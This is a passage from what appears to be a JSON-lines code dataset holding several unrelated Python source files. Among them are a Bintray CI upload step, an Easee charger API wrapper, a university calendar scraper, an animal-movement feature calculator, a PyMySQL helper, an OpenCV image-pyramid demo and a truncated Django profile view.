\"./jfrog bt upload --override=true --publish=true \"\n print(\"Uploading files to Bintray with command: \" + upload_cmd_prefix + upload_cmd_suffix)\n os.system(upload_cmd_prefix + upload_cmd_suffix)\n \n# This actually executes the step, must be after all methods are defined.\nexec(args.step_name + \"()\")","sub_path":"ci/travis_pipeline.py","file_name":"travis_pipeline.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"212211738","text":"import logging\nfrom typing import Any, Dict, List\n\nfrom .utils import BaseDict\nfrom .charger import Charger\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass Circuit(BaseDict):\n def __init__(self, data: Dict[str, Any], site: Any, easee: Any):\n super().__init__(data)\n self.id: int = data[\"id\"]\n self.site = site\n self.easee = easee\n\n async def set_dynamic_current(self, currentP1: int, currentP2: int = None, currentP3: int = None):\n \"\"\" Set circuit dynamic current \"\"\"\n json = {\n \"dynamicCircuitCurrentP1\": currentP1,\n \"dynamicCircuitCurrentP2\": currentP2 if currentP2 is not None else currentP1,\n \"dynamicCircuitCurrentP3\": currentP3 if currentP3 is not None else currentP1,\n }\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/settings\", json=json)\n\n async def set_max_current(self, currentP1: int, currentP2: int = None, currentP3: int = None):\n \"\"\" Set circuit max current \"\"\"\n json = {\n \"maxCircuitCurrentP1\": currentP1,\n \"maxCircuitCurrentP2\": currentP2 if currentP2 is not None else currentP1,\n \"maxCircuitCurrentP3\": currentP3 if currentP3 is not None else currentP1,\n }\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/settings\", json=json)\n\n async def set_rated_current(self, ratedCurrentFuseValue: int):\n \"\"\" Set circuit rated current - requires elevated access (installers only) \"\"\"\n json = {\"ratedCurrentFuseValue\": ratedCurrentFuseValue}\n return await self.easee.post(f\"/api/sites/{self.site.id}/circuits/{self.id}/rated_current\", json=json)\n\n def get_chargers(self) -> List[Charger]:\n return [Charger(c, self.easee, self.site, self) for c in self[\"chargers\"]]\n\n\nclass Site(BaseDict):\n def __init__(self, data: Dict[str, Any], easee: Any):\n super().__init__(data)\n self.id: int = data[\"id\"]\n self.easee = easee\n\n def get_circuits(self) -> List[Circuit]:\n return [Circuit(c, self, self.easee) for c in self[\"circuits\"]]\n\n async def set_name(self, name: str):\n \"\"\" Set name for the site \"\"\"\n json = {**self.get_data(), \"name\": name}\n return await self.easee.put(f\"/api/sites/{self.id}\", json=json)\n\n async def set_currency(self, currency: str):\n \"\"\" Set currency for the site \"\"\"\n json = {**self.get_data(), \"currencyId\": currency}\n return await self.easee.put(f\"/api/sites/{self.id}\", json=json)\n\n async def set_price(\n self, costPerKWh: float, vat: float = None, currency: str = None, costPerKwhExcludeVat: float = None,\n ):\n \"\"\" Set price per kWh for the site \"\"\"\n\n json = {\n \"costPerKWh\": costPerKWh,\n }\n\n if vat is None:\n vat = self.get(\"vat\")\n\n if currency is None:\n currency = self.get(\"currencyId\")\n\n if costPerKwhExcludeVat is None:\n costPerKwhExcludeVat = costPerKWh / (100.0 + vat) * 100.0\n\n json = {\n \"currencyId\": currency,\n \"costPerKWh\": costPerKWh,\n \"vat\": vat,\n \"costPerKwhExcludeVat\": costPerKwhExcludeVat,\n }\n\n return await self.easee.post(f\"/api/sites/{self.id}/price\", json=json)\n","sub_path":"easee/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485919653","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport csv\nfrom unidecode import unidecode\nimport json\n\nfrom entities import entities\n\ncalFile = open('calendario2018-2.csv', 'w')\n\ncalWriter = csv.writer(calFile)\n\ncalWriter.writerow(['dataInicio', 'dataFim', 'entidade', 'info'])\n\nurl = 'https://www.dac.unicamp.br/portal/calendario/2018/graduacao'\n\n# url = 'https://www.dac.unicamp.br/portal/calendario/2018/pos-graduacao'\n# url = 'https://www.dac.unicamp.br/portal/calendario/2018/medicina'\n\nfilename = 'calendario.sql'\n\nsource = requests.get(url).text\nmesDict = {'Janeiro': '01', 'Fevereiro': '02', 'Março': '03', 'Abril': '04', 'Maio': '05', 'Junho': '06', 'Julho': '07', 'Agosto': '08', 'Setembro': '09', 'Outubro': '10', 'Novembro': '11', 'Dezembro': '12'}\n\npage = BeautifulSoup(source, 'lxml')\ntabela = page.find(id='conteudo').find('table')\n\nwith open(filename, 'w') as f:\n pass\n\ninicioAntigo = ''\nfimAntigo = ''\nmesAtual = ''\nanoAtual = ''\n\nd = {}\n\nfor key, value in entities.items():\n k = unidecode(key).lower()\n if isinstance(value, list):\n for item in value:\n i = unidecode(item).lower()\n if i not in d:\n d[i] = k\n else:\n v = unidecode(value).lower()\n if v not in d:\n d[v] = k\n\n# print(json.dumps(d, indent=4, sort_keys=True))\n\nfor tr in tabela.findAll('tr'):\n\n p = tr.findAll('td')\n\n tam = len(p)\n\n if tam is 3:\n\n data = p[0].text.strip()\n\n splitted = re.split(' a | e ', data)\n\n if splitted[0] is '':\n splitted[0] = '-'\n\n dataInicio = splitted[0] + '/' + mesAtual + '/' + anoAtual\n dataFim = dataInicio\n\n if len(splitted) is 2:\n\n fim = splitted[1].split('.')\n if len(fim) is 2:\n dataFim = (fim[0]) + '/' + fim[1] + '/' + anoAtual\n else:\n dataFim = fim[0] + '/' + mesAtual + '/' + anoAtual\n\n entidade = p[1].text.strip()\n info = p[2].text.strip()\n\n inicioAntigo = dataInicio\n fimAntigo = dataFim\n\n if '-' in dataInicio:\n dataInicio = '01' + dataInicio[1:]\n \n if '-' in dataFim:\n dataFim = '01' + dataFim[1:]\n\n semestre = 1 if int(dataInicio[3:5]) < 7 else 2\n\n # print(dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8'))\n calWriter.writerow([dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8')])\n\n entidade = unidecode(entidade.lower())\n \n with open(filename, 'a+') as f:\n f.write(\"INSERT INTO CALENDAR (YEAR_INTEGER, SEMESTER_INTEGER, ENTITY_STR, DESCRIPTION_STR, INITIAL_DATE, END_DATE, URI_STR) VALUES (%s, %s, '%s', '%s', '%s', '%s', '%s');\\n\" %\n (dataInicio[-4:], semestre, d[entidade], info, dataInicio, dataFim, url))\n calWriter.writerow([dataInicio, dataFim, entidade, info])\n\n elif tam is 2:\n\n dataInicio = inicioAntigo\n dataFim = fimAntigo\n entidade = p[0].text.strip()\n info = p[1].text.strip()\n\n # print(dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8'))\n # calWriter.writerow([dataInicio, dataFim, entidade.encode('utf-8'), info.encode('utf-8')])\n calWriter.writerow([dataInicio, dataFim, entidade, info])\n\n elif tam is 1:\n m = p[0].text.strip().split(' de ')\n\n # print(m)\n\n if m[0] in mesDict.keys():\n mesAtual = mesDict[m[0]]\n anoAtual = m[1]\n\n # print('mes atual ', mesAtual, anoAtual)\n","sub_path":"Scripts/Calendario Postgres DB/calendarioScrapper.py","file_name":"calendarioScrapper.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"154749763","text":"import math\nimport datetime, sys\nimport itertools\nfrom db import *\nfrom multiprocessing import Pool\n\nfrom model.dataset_model import Dataset\nfrom model.movement_data_model import Movement_data\n\n\ndef calculate_absolute_features(id):\n \"\"\" Calculate the absolute features for the dataset id.\n This is using multiple processes to speed up the calculation\n It uses 5 processes - defined at pool_size = 5\n\n Keyword arguments:\n id -- id of the dataset\n\n \"\"\"\n print('Absolute features started', file=sys.stderr)\n # print(datetime.datetime.utcnow(), file=sys.stderr)\n\n # create new db session\n session = create_session()\n # get the dataset row from the db\n dataset = session.query(Dataset).filter_by(id=id)\n # get needed values\n dataset[0].status = 'Calculating absolute features'\n dataset[0].progress = 5\n # commit status and progress bar changes\n session.commit()\n\n # tmp query to get all distinct animal ids from the dataset\n tmp = session.query(Movement_data) \\\n .filter_by(dataset_id=id) \\\n .distinct(Movement_data.animal_id)\n\n # list for the distinct animal ids of the dataset\n animal_ids = []\n # save the ids in the list\n for data in tmp:\n animal_ids.append(data.animal_id)\n\n # progress per animal in the loop\n # this is added to the progress bar after an animal absolute features calculation are finished\n progress_per_animal = 45 / (len(animal_ids) + 1)\n\n # Multiprocessing\n pool_size = 5 # 5 parallel processes\n pool = Pool(pool_size)\n # call the absolute_feature_worker method with the needed parameters\n pool.map(absolute_feature_worker,\n zip((range(0, len(animal_ids))), itertools.repeat(id), itertools.repeat(animal_ids),\n itertools.repeat(progress_per_animal), ))\n pool.close()\n # wait until all processes are finished\n pool.join()\n\n session.remove()\n # print('Absolute features finished', file=sys.stderr)\n # print(datetime.datetime.utcnow(), file=sys.stderr)\n\n\ndef absolute_feature_worker(tmp):\n \"\"\" Calculate absolute features for one animal. This is called by a pool.\n\n Keyword arguments:\n tmp - list of parameters\n tmp[0] - parameter i needed for animal_ids\n tmp[1] - id of the dataset\n tmp[2] - list of all animal_ids is used with parameter tmp[0]\n tmp[3] - progress_per_animal, this value is added to the progess bar after the calculation is finished\n\n \"\"\"\n # create a new threaded db session\n session = create_session()\n # rewrite the tmp values to make it easier\n i = tmp[0]\n id = tmp[1]\n animal_ids = tmp[2]\n progress_per_animal = tmp[3]\n # get the dataset\n dataset = session.query(Dataset).filter_by(id=id)\n # needed for speed and acceleration calculation\n fps = dataset[0].fps\n\n # and extract the absolute features\n try:\n # query the movement data of the animal\n animal = session.query(Movement_data) \\\n .filter_by(dataset_id=id, animal_id=animal_ids[i]) \\\n .order_by(Movement_data.time)\n print('Animal ' + str(i), file=sys.stderr)\n\n # calculate the metric distance\n calculate_metric_distance(animal)\n # calculate the speed feature\n calculate_speed(animal, fps)\n # calculate the acceleration feature\n calculate_acceleration(animal, fps)\n # calculate the direction of the moving entity\n calculate_direction(animal)\n\n # change the progress bar\n dataset[0].progress += progress_per_animal\n # add the data to the database\n session.commit()\n\n except Exception as e:\n # Something went wrong when calculating absolute features\n session.rollback()\n dataset[0].status = 'Error - calculating absolute features ' + str(e)[0:200]\n dataset[0].error = True\n # session.commit()\n pass\n # remove the session\n session.remove()\n\n\ndef calculate_metric_distance(animal):\n \"\"\" Calculate the metric distance between the frame.\n\n Keyword arguments:\n animal -- dataset with all time moments\n\n \"\"\"\n animal[0].metric_distance = 0\n number_elem = animal.count()\n for i in range(1, number_elem):\n dist = math.hypot(animal[i].get_x() - animal[i - 1].get_x(),\n animal[i].get_y() - animal[i - 1].get_y())\n animal[i].metric_distance = dist\n\n\ndef calculate_speed(animal, fps):\n \"\"\"\n Calculate the averaged speed of an animal\n #ToDo Change this right now in 25 frames per second calculation\n\n Keyword arguments:\n animal -- a animal with all frames\n fps -- frames per second needed to calculate the right speed per second\n\n \"\"\"\n # fps divide by 2 and round down, idea is to take the first (fps/2) and the following (fps/2)\n # to calculate the averaged speed\n fps = math.floor(fps / 2) or 1\n number_elem = animal.count()\n for i in range(0, number_elem):\n sum_dist = 0\n for j in range(i - fps, i + fps + 1):\n if j >= 0 and j < number_elem:\n sum_dist = sum_dist + animal[j].metric_distance\n animal[i].speed = sum_dist\n\n\ndef calculate_acceleration(animal, fps):\n \"\"\" Calculate the average Acceleration of an animal .\n\n Keyword arguments:\n animal -- animal with all frames\n fps -- frames per second needed to calculate the right speed per second\n\n \"\"\"\n # fps divide by 2 and round down, idea is to take the first (fps/2) and the following (fps/2)\n # to calculate the averaged speed\n fps = math.floor(fps / 2) or 1\n number_elem = animal.count()\n for i in range(0, number_elem):\n array_speed = []\n for j in range(i - fps, i + fps + 1):\n if j >= 0 and j < number_elem:\n array_speed.append(animal[j].speed)\n sum_change = sum([array_speed[j + 1] - array_speed[j] for j in range(len(array_speed) - 1)])\n animal[i].acceleration = sum_change\n\n\ndef calculate_direction(animal):\n \"\"\" Calculate the moving direction of the animal.\n\n Keyword arguments:\n animal -- dataset with all time moments\n\n \"\"\"\n animal[0].direction = 0\n number_elem = animal.count()\n for i in range(1, number_elem):\n angle = math.atan2((animal[i].get_y() - animal[i - 1].get_y()), (animal[i].get_x() - animal[i - 1].get_x()))\n\n angle = round(math.degrees(angle), 2)\n animal[i].direction = angle\n","sub_path":"src/app/feature_extraction/absolute_features.py","file_name":"absolute_features.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202274136","text":"#!/usr/bin/env python\n\n\"\"\"write_mmn_cdi_RMds.py: write out MEG & CDI measurement in tidy-format.\n\"\"\"\n\nimport datetime\nimport itertools\nimport os.path as op\nimport re\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\n\nfrom badbaby import defaults\nfrom badbaby import return_dataframes as rd\n\n# Parameters\ndatadir = defaults.datadir\ndate = datetime.datetime.today()\ndate = '{:%m%d%Y}'.format(date)\nanalysese = ['Individual', 'Oddball']\nages = [2, 6]\nlp = defaults.lowpass\nregex = r\"[0-9]+\"\nsolver = 'lbfgs'\n\n\n# covariates\nmeg, cdi = rd.return_dataframes('mmn', ses=True)\nmeg.reset_index(inplace=True)\nmeg['cdiId'] = ['BAD_%s' % xx for xx in [\n re.findall(regex, ss)[0] for ss in meg.subjId]]\ncdi.rename(columns={'subjId': 'cdiId'}, inplace=True)\ncovs = pd.merge(meg[['ses', 'age', 'gender', 'headSize',\n 'maternalEdu', 'maternalHscore',\n 'paternalEdu', 'paternalHscore',\n 'maternalEthno', 'paternalEthno', 'birthWeight',\n 'subjId', 'cdiId']], cdi, on='cdiId',\n validate='m:m')\ncovs['megId'] = ['bad_%s' % xx for xx in covs.subjId]\ncovs.info()\n\n# Wrangle MEG CDI vars\ndfs = list()\nfor iii, analysis in enumerate(analysese):\n print('Reading data for %s analysis... ' % analysis)\n if iii == 0:\n conditions = ['standard', 'ba', 'wa']\n else:\n conditions = ['standard', 'deviant']\n combos = list(itertools.combinations(conditions, 2))\n fi_in = op.join(defaults.datadir,\n 'AUC_%d_%s_%s.nc'\n % (lp, solver, analysis))\n ds = xr.open_dataarray(fi_in)\n dfs.append(ds.to_dataframe(name='AUC').reset_index())\ndf = pd.concat(dfs, axis=0, verify_integrity=True, ignore_index=True)\ndf.rename(columns={'subject': 'megId'}, inplace=True)\nDs = df.merge(covs, on='megId', validate='m:m')\nmapping = {'standard-ba': 'plosive',\n 'standard-wa': 'aspirative',\n 'standard-deviant': 'mmn',\n 'ba-wa': 'deviant'}\nDs.replace(mapping, inplace=True)\nDs['vocab-asin'] = np.arcsin(np.sqrt(Ds.vocab.values/Ds.vocab.values.max())) # noqa\nDs['m3l-asin'] = np.arcsin(np.sqrt(Ds.m3l.values/Ds.m3l.values.max()))\nDs.info()\nDs.to_csv(op.join(datadir, 'cdi-meg_%d_%s_tidy_%s.csv' % (lp, solver, date)))\n","sub_path":"badbaby/analysis/write_cdi-meg_dataset.py","file_name":"write_cdi-meg_dataset.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505552833","text":"import sys\nimport matlab.engine\n# from netCDF4 import Dataset\n\nncfilepath = sys.argv[1]\nmatpath = sys.argv[2]\nmatlabpath = sys.argv[3]\nprint(ncfilepath)\nprint(matpath)\nprint(matlabpath)\n\n# Note: the next line start the matlab commend line in the path of the oips project root path\n# thus , it can't find the function Add or Readnc2Json or any other .m file which are in the same folder with this ReadDepth.py\n# so, the next thing I should do is to fix this!!!!\n# How did I know? add the option \"-desktop\" to the function matlab.engine.start_matlab(),\n# and in the matlab window, you can see work forlder is the oips project root folder\neng = matlab.engine.start_matlab()\n# eng.addpath(\"D:/MyFile/MyCode/Projects/OIPS/models/python/\")\neng.addpath(matlabpath)\neng.addpath(matpath)\n\ntf = eng.isprime(37)\nprint(tf)\na = 3\nb = 4\nc = eng.Add(a, b)\nprint(c)\n\n# eng.ReadNc(ncfilepath)\neng.Readnc2Mat(ncfilepath, matpath,nargout=0)\n# eng.edit('Add', nargout=0)\n\n# rootgrp = Dataset(ncfilepath,\"\")\n\nsys.stdout.flush()\n","sub_path":"models/python/ReadDepth.py","file_name":"ReadDepth.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117651681","text":"# -*- coding:utf-8 -*-\r\n# @Desc : \r\n# @Author : Administrator\r\n# @Date : 2019-05-17 9:49\r\n\r\nimport pymysql\r\nimport json\r\n\r\n# 数据库信息及创建数据库:\r\n\"\"\"\r\ndb_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"root\",\r\n \"passwd\": \"root\",\r\n \"db\": \"ShuangSeQiuDB\", \r\n}\r\n# 创建数据库: create database ShuangSeQiuDB default charset=utf8;\r\n\"\"\"\r\n# 创建数据库表:\r\n\"\"\"\r\nCREATE TABLE excel(\r\n id int(11) NOT NULL,\r\n redOne int(11) DEFAULT NULL,\r\n redTwo int(11) DEFAULT NULL,\r\n redThree int(11) DEFAULT NULL,\r\n redFour int(11) DEFAULT NULL,\r\n redFive int(11) DEFAULT NULL,\r\n redSix int(11) DEFAULT NULL,\r\n blueSeven int(11) DEFAULT NULL,\r\n PRIMARY KEY (id)\r\n) ENGINE=InnoDB DEFAULT CHARSET=utf8\r\n\"\"\"\r\n\r\n\r\nclass MySQLHelper(object):\r\n\r\n def __init__(self, db_config):\r\n # 注: 创建对象的时候不链接数据库,再使用的时候才链接数据库\r\n self.connection = None\r\n self.cursor = None\r\n\r\n def query_all_list(self, sql, *args): # 查询数据库所有行数据\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute(sql, args)\r\n return self.cursor.fetchall()\r\n except Exception as ex:\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def query_one_line(self, sql, *args): # 查询数据库一行数据\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute(sql, args)\r\n return self.cursor.fetchone()\r\n except Exception as ex:\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def update_execute(self, sql, *args): # 数据库的增,删,改操作\r\n try:\r\n self.connection = pymysql.connect(**db_config)\r\n self.cursor = self.connection.cursor()\r\n # 返回执行sql语句之后受影响的行数\r\n num = self.cursor.execute(sql, args)\r\n self.connection.commit()\r\n return num\r\n except Exception as ex:\r\n self.connection.rollback()\r\n print(ex)\r\n finally:\r\n self.close()\r\n\r\n def close(self): # 关闭资源\r\n if self.cursor: # 获取到了操作游标\r\n self.cursor.close()\r\n if self.connection: # 数据库已链接\r\n self.connection.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n db_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"root\",\r\n \"passwd\": \"root\",\r\n \"db\": \"ShuangSeQiuDB\",\r\n }\r\n helper = MySQLHelper(db_config)\r\n # print(helper.connection)\r\n\r\n # sql = \"select * from excel\"\r\n # print(helper.query_all_list(sql))\r\n # print(helper.query_one_line(sql))\r\n\r\n # 根据id查询一条数据\r\n # sql = \"select * from excel where id = %s\"\r\n # print(helper.query_one_line(sql,1))\r\n\r\n # 删除数据库表\r\n # sql = \"drop table excel\"\r\n # print(helper.update_execute(sql))\r\n\r\n # 创建数据库表\r\n # sql = \"\"\"CREATE TABLE excel(\r\n # id int(11) NOT NULL,\r\n # redOne int(11) DEFAULT NULL,\r\n # redTwo int(11) DEFAULT NULL,\r\n # redThree int(11) DEFAULT NULL,\r\n # redFour int(11) DEFAULT NULL,\r\n # redFive int(11) DEFAULT NULL,\r\n # redSix int(11) DEFAULT NULL,\r\n # blueSeven int(11) DEFAULT NULL,\r\n # PRIMARY KEY (id)\r\n # ) ENGINE=InnoDB DEFAULT CHARSET=utf8\"\"\"\r\n # print(helper.update_execute(sql))\r\n\r\n # 批量插入数据(json)\r\n # 1. 逐条插入数据库数据,多次commit()操作: insert into 表名 values(...)\r\n # with open(\"双色球中奖数据保存.json\", encoding=\"utf-8\") as ft:\r\n # ssq_list = ft.readlines() # 读取json文件中的数据,获得json字符串组成的一个列表\r\n # # print(ssq_list,type(ssq_list))\r\n # for json_dict in [json.loads(json_str) for json_str in ssq_list]: # 获得字典类型数据组成的一个列表并遍历\r\n # print(json_dict, type(json_dict))\r\n # # sql = \"insert into excel values(json_dict['id'],json_dict['redOne'],json_dict['redTwo'],json_dict['redThree'],json_dict['redFour'],json_dict['redFive'],json_dict['redSix'],json_dict['blueSeven'])\"\r\n # sql = \"insert into excel values(%s,%s,%s,%s,%s,%s,%s,%s)\" % (\r\n # json_dict['id'], json_dict['redOne'], json_dict['redTwo'], json_dict['redThree'], json_dict['redFour'],\r\n # json_dict['redFive'], json_dict['redSix'], json_dict['blueSeven'])\r\n # helper.update_execute(sql)\r\n\r\n # 2. 一次插入多条数据库数据: 一次commit()操作: insert into 表名 values(...)(...)...\r\n sql = \"insert into excel values \"\r\n with open(\"双色球中奖数据保存.json\", encoding=\"utf-8\") as ft:\r\n dict_list = [json.loads(json_str) for json_str in ft.readlines()] # 把文件中json字符串转换为字典dict组成的数据列表\r\n # print(dict_list[0],type(dict_list[0]))\r\n for dict in dict_list:\r\n # json_tuple = tuple(dict.values()) # 遍历字典列表并把每个字典的value值组成一个元组\r\n json_tuple = str(tuple(dict.values())) # 遍历字典列表并把每个字典的value值组成一个元组,再变成字符串\r\n # print(json_tuple)\r\n sql += json_tuple + \",\"\r\n # print(sql)\r\n # print(sql.rstrip(\",\"))\r\n helper.update_execute(sql.rstrip(\",\")) # 去掉sql字符串最后面的,号\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"02.DatabaseDoc/01.数据库-MySQL/10.MySQL插入JSON数据.py","file_name":"10.MySQL插入JSON数据.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450026691","text":"d1 = {\"a\": 100, \"b\":200, \"c\":300, \"z\":500}\nd2 = {\"a\": 300, \"b\": 200, \"c\": 400,\"d\":900}\n\nmylist = []\nmylist.append(d1)\nmylist.append(d2)\n\nresult = {}\n\nfor mydict in mylist:\n for key in mydict:\n if key in result:\n val1 = result[key]\n val2 = mydict[key]\n result[key] = val1+val2\n else:\n result[key] = mydict[key]\n\nprint(result)","sub_path":"python_batch_2/AssignmentSolutions/Dictionary_Solution_19.py","file_name":"Dictionary_Solution_19.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143044488","text":"import falcon\nimport json\nimport datetime\nimport util.helpers as helpers\nfrom util.logging import logger\n\nfrom DBModels.SAP import Orders\nfrom playhouse.shortcuts import model_to_dict\n\ndef build_order_dict(query_object):\n\n out = helpers.defaultdict_nested()\n for order in query_object.naive():\n\n order_key = out[order.order_no][order.ext_item]\n\n # Aditional Keys\n order_key[\"sold_to_BP\"] = order.sold_to_party\n order_key[\"contract_account\"] = order.contract_account\n order_key[\"Bladsys_ID\"] = order.old_sub_no\n\n # Product + length details\n order_key[\"orig_item\"] = order.orig_item\n order_key[\"order_valid_from\"] = order.order_valid_from\n order_key[\"order_valid_to\"] = order.order_valid_to\n order_key[\"publication\"] = order.publication\n order_key[\"edition\"] = order.edition\n order_key[\"product_type\"] = order.product_type\n order_key[\"access_level\"] = order.access_level\n order_key[\"sales_doc_type\"] = order.sales_doc_type\n\n # Sub Details\n order_key[\"sub_id\"] = order.sub_id\n order_key[\"sub_valid_from\"] = order.sub_valid_from\n order_key[\"sub_valid_to\"] = order.sub_valid_to\n\n # Channel In\n order_key[\"campaign_id\"] = order.campaign_id\n\n # Terminaion\n order_key[\"termination_created_on\"] = order.termination_created_on\n order_key[\"end_reason\"] = order.end_reason\n\n order_key[\"items\"][order.order_item] = model_to_dict(order, exclude=[\n Orders.order_no,\n Orders.ext_item,\n Orders.sub_id,\n Orders.order_valid_from,\n Orders.order_valid_to,\n Orders.sold_to_party,\n Orders.contract_account,\n Orders.campaign_id,\n Orders.end_reason,\n Orders.sales_doc_type,\n Orders.sub_valid_to,\n Orders.sub_valid_from,\n Orders.termination_created_on,\n Orders.order_item,\n Orders.orig_item,\n Orders.old_sub_no,\n Orders.publication,\n Orders.edition,\n Orders.product_type,\n Orders.seq_no,\n Orders.access_level\n ])\n\n return out\n\n\nclass Orders_Collection(object):\n def on_get(self, req, resp):\n\n # Max 50 rows at once; default = 10\n rows = req.get_param_as_int(\"count\", min = 1, max = 50)\n if rows == None:\n rows = 10\n\n # Paging starts at 1\n page = req.get_param_as_int(\"page\", min = 1)\n if page == None:\n page = 1\n\n logger.info(\"Getting page %s of %s records\", page, rows)\n\n query = Orders.select().where(\n (\n (Orders.order_valid_to > datetime.datetime.now()) &\n (Orders.order_valid_from < datetime.datetime.now())\n ),\n Orders.orig_item_indc == \"X\"\n ).order_by(Orders.order_valid_from.desc()).paginate(page, rows)\n\n results = query.__len__()\n\n if(results > 1):\n out = build_order_dict(query)\n else:\n out = {}\n\n resp.body = helpers.formatted_respons(req=req, resp=resp, data=out)\n resp.status = falcon.HTTP_200\n\nclass Orders_Item(object):\n def on_get(self, req, resp, orders):\n\n order_no_ext_tuple = orders.split(sep=\"+\")\n\n for key, value in enumerate(order_no_ext_tuple):\n split = value.split(sep=\"_\")\n\n\n if(len(str(split[0])) != 9):\n raise falcon.HTTPInvalidParam(msg=\"Invalid Order-number '\"+split[0]+\"' - Order-numbers should be 9 digits long\", param_name=\"order-no\")\n\n try:\n split[1] = str(split[1]).rjust(6, '0')\n\n # Defaults to ext_item #1\n if(split[1] == \"000000\"):\n split[1] = \"000010\"\n except:\n # Defaults to first ext_item if nothing's defined\n # Alternative: Throw error for missing ext_item\n split.append(\"000010\")\n\n order_no_ext_tuple[key] = split[0] + \"_\" + split[1]\n\n logger.info(\"Getting records for following pairs of Order_no+Ext_item: %s\", ', '.join(str(e) for e in list(order_no_ext_tuple)))\n\n query = Orders.select().where(\n Orders.order_no+\"_\"+Orders.ext_item << order_no_ext_tuple\n ).order_by(Orders.ext_item.desc()).order_by(Orders.order_item.desc())\n\n results = query.__len__()\n\n if(results >= 1):\n out = build_order_dict(query)\n else:\n out = {\"message\": \"No orders found\"}\n\n resp.body = helpers.formatted_respons(req=req, resp=resp, data=out)\n resp.status = falcon.HTTP_200\n","sub_path":"app/Resources/SAP.py","file_name":"SAP.py","file_ext":"py","file_size_in_byte":5056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254833399","text":"import cv2.cv2 as cv\n\nimg = cv.imread(\"imgs/lena.jpg\")\n\n# simple usage\n\n# lr = cv.pyrDown(img)\n# lr1 = cv.pyrDown(lr)\n# lr2 = cv.pyrDown(lr1)\n#\n#\n# hr = cv.pyrUp(lr2)\n# hr1 = cv.pyrUp(hr)\n# hr2 = cv.pyrUp(hr1)\n#\n# cv.imshow(\"original image\", img)\n# cv.imshow(\"first down\", lr)\n# cv.imshow(\"second down\", lr1)\n# cv.imshow(\"third down\", lr2)\n# cv.imshow(\"first up\", hr)\n# cv.imshow(\"second up\", hr1)\n# cv.imshow(\"third up\", hr2)\n\n\n# laplacian pyramids\nlayer = img.copy()\ngaussian_pyr = [layer]\n\nfor i in range(6):\n layer = cv.pyrDown(layer)\n gaussian_pyr.append(layer)\n # cv.imshow(\"{}-down\".format(i+1), layer)\n\nlayer = gaussian_pyr[5]\ncv.imshow(\"Upper level Gaussian pyramid\", layer)\nlp = layer\n\nfor i in range(5, 0, -1):\n gaussian_expanded = cv.pyrUp(gaussian_pyr[i])\n laplacian_pyr = cv.subtract(gaussian_pyr[i-1], gaussian_expanded)\n cv.imshow(\"{}-pyramid\".format(i), laplacian_pyr)\n\n\ncv.waitKey(0)\ncv.destroyAllWindows()","sub_path":"image_pyramids.py","file_name":"image_pyramids.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551207251","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User\nfrom application.models import Quack, Follow, Profile\nfrom django.contrib.auth.decorators import login_required\nfrom application.forms import UserPanelForm\n\ndef profile(request, username):\n\tcontext ={}\n\ttry:\n\t\tuser = User.objects.get(username=username)\n\t\tprofile = Profile.objects.get(user=user)\n\t\tcontext.update({\n\t\t\t'myprofile': profile,\n\t\t})\n\t\t\n\t\tif request.user.is_authenticated:\n\t\t\tfollower = request.user\n\n\t\t\tif request.method == \"POST\":\n\t\t\t\ttry:\n\t\t\t\t\tfollow = Follow.objects.get(follower=follower, followed=user)\n\t\t\t\t\tfollow.delete()\n\t\t\t\texcept Follow.DoesNotExist:\n\t\t\t\t\tstart_following = Follow()\n\t\t\t\t\tstart_following.follower = follower\n\t\t\t\t\tstart_following.followed = user\n\t\t\t\t\tstart_following.save()\n\n\t\t\tif len(Follow.objects.filter(follower=follower, followed=user)):\n\t\t\t\tcontext.update({\n\t\t\t\t\t'is_following': True\n\t\t\t\t})\n\t\tcontext.update(get_user_context(user))\n\texcept User.DoesNotExist:\n\t\treturn render(request, 'profiles/profile.html', {})\n\n\treturn render(request, 'profiles/profile.html', context)\n\n@login_required(login_url='/login/')\ndef userpanel(request):\n\tprofile = Profile.objects.get(user=request.user)\n\tif request.method == \"POST\":\n\t\tform = UserPanelForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tif request.POST['image_link']:\n\t\t\t\tprofile.image_link = 